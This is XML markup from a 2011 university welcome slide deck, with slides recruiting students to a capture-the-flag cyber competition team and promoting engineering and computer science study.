              <a:gd name="T3" fmla="*/ 1219200 h 2208"/>
              <a:gd name="T4" fmla="*/ 101600 w 832"/>
              <a:gd name="T5" fmla="*/ 2895599 h 2208"/>
              <a:gd name="T6" fmla="*/ 558800 w 832"/>
              <a:gd name="T7" fmla="*/ 3505200 h 2208"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 60000 65536"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 w 832"/>
              <a:gd name="T13" fmla="*/ 0 h 2208"/>
              <a:gd name="T14" fmla="*/ 832 w 832"/>
              <a:gd name="T15" fmla="*/ 2208 h 2208"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T8">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T9">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T10">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T12" t="T13" r="T14" b="T15"/>
            <a:pathLst>
              <a:path w="832" h="2208">
                <a:moveTo>
                  <a:pt x="640" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="736" y="232"/>
                  <a:pt x="832" y="464"/>
                  <a:pt x="736" y="768"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="640" y="1072"/>
                  <a:pt x="128" y="1584"/>
                  <a:pt x="64" y="1824"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="2064"/>
                  <a:pt x="176" y="2136"/>
                  <a:pt x="352" y="2208"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="152400">
            <a:solidFill>
              <a:srgbClr val="DDDDDD"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2052" name="Freeform 10"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="5715000" y="2514600"/>
            <a:ext cx="1320800" cy="3505200"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 1016000 w 832"/>
              <a:gd name="T1" fmla="*/ 0 h 2208"/>
              <a:gd name="T2" fmla="*/ 1168400 w 832"/>
              <a:gd name="T3" fmla="*/ 1219200 h 2208"/>
              <a:gd name="T4" fmla="*/ 101600 w 832"/>
              <a:gd name="T5" fmla="*/ 2895599 h 2208"/>
              <a:gd name="T6" fmla="*/ 558800 w 832"/>
              <a:gd name="T7" fmla="*/ 3505200 h 2208"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 60000 65536"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 w 832"/>
              <a:gd name="T13" fmla="*/ 0 h 2208"/>
              <a:gd name="T14" fmla="*/ 832 w 832"/>
              <a:gd name="T15" fmla="*/ 2208 h 2208"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T8">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T9">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T10">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T12" t="T13" r="T14" b="T15"/>
            <a:pathLst>
              <a:path w="832" h="2208">
                <a:moveTo>
                  <a:pt x="640" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="736" y="232"/>
                  <a:pt x="832" y="464"/>
                  <a:pt x="736" y="768"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="640" y="1072"/>
                  <a:pt x="128" y="1584"/>
                  <a:pt x="64" y="1824"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="2064"/>
                  <a:pt x="176" y="2136"/>
                  <a:pt x="352" y="2208"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="152400">
            <a:solidFill>
              <a:srgbClr val="DDDDDD"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2053" name="Oval 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="2065589">
            <a:off x="3505200" y="5334000"/>
            <a:ext cx="990600" cy="685800"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="DDDDDD"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="DDDDDD"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2054" name="Oval 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="19534411" flipH="1">
            <a:off x="4800600" y="5334000"/>
            <a:ext cx="990600" cy="685800"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="DDDDDD"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2055" name="Picture 4" descr="uclionOsamaLogo"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="762000" y="457200"/>
            <a:ext cx="2438400" cy="3333750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2056" name="Picture 8" descr="uclionOsamaLogoRight"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5943600" y="457200"/>
            <a:ext cx="2438400" cy="3335338"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2057" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="426292" y="4245739"/>
            <a:ext cx="8534400" cy="2603790"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="08F81F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Come Join U-C-Lion Team </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="08F81F"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="08F81F"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FEB4AC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>9/12/2011 Monday Night EN109 8:10-8:30pm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="08F81F"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="08F81F"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="08F81F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>iCTF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="08F81F"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 2011 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="08F81F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Competition </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="08F81F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>12/2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="08F81F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Friday  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="08F81F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>9am-6pm@SENG A210</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="08F81F"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="08F81F"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>International </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Capture The Flag Cyberwar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Competition</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="08F81F"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="08F81F"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="08F81F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Visit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="08F81F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>U-C-Lion Team Wiki Site: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="08F81F"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="08F81F"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>://athena.uccs.edu/ictf/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="08F81F"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="08F81F"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="08F81F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Learn </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="08F81F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Neat Tricks/Analysis for Cyber </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="08F81F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attacks/Defenses</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="08F81F"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="08F81F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    How to set up secure server site for projects</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="08F81F"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="08F81F"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Contact Info: Prof. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>Chuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>Yue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>, cyue@uccs.edu</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3307508" y="2961541"/>
            <a:ext cx="2590800" cy="1661993"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF6600"/>
                </a:solidFill>
              </a:rPr>
              <a:t>All UCCS students </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF6600"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF6600"/>
                </a:solidFill>
              </a:rPr>
              <a:t>All levels are welcome</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF6600"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF6600"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3429000" y="1828800"/>
            <a:ext cx="2400301" cy="1066800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41346117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381000" y="1103313"/>
            <a:ext cx="8410575" cy="2677656"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Shared my security mistakes, observed cyber incidents, and potential future threats</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Highlight some IT trends and opportunities, and related security issues.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Feel </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>free to contact me if you are interested in cyber security/IT related research.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Date Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Freshmen Welcome 8/20/2011</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Edward Chow</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{86B03ED4-55E6-486A-B9BC-29A44110F5E8}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>28</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="352284095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0025"/>
            <a:ext cx="8382000" cy="978729"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Why Choose Engineering and Computer Science</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>? Aim High!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381001" y="1103313"/>
            <a:ext cx="7086600" cy="4228850"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Be the founders/leaders of next high impact tech companies.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Create products/services </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>benefit society and </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>improve quality of life</a:t>
            </a:r>
          </a:p>
          <a:p>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EAS Programs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>UCCS/EAS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{86B03ED4-55E6-486A-B9BC-29A44110F5E8}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>29</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2199" y="1219927"/>
            <a:ext cx="1552575"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798" y="3724230"/>
            <a:ext cx="1552575" cy="192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http://techfreep.com/images/brinp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99" y="3762330"/>
            <a:ext cx="2143126" cy="14001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099" y="5168812"/>
            <a:ext cx="2143126" cy="275460"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>Larry Page/Sergey </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>Brin</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2055" name="Picture 7" descr="Dr. Carlos Arauj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9574" y="3686131"/>
            <a:ext cx="1737524" cy="191851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432823" y="5518106"/>
            <a:ext cx="1851026" cy="1138773"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IEEE Daniel Award winner </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>FeRAM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> inventor</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Symmetrix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ramtron</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Founder</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
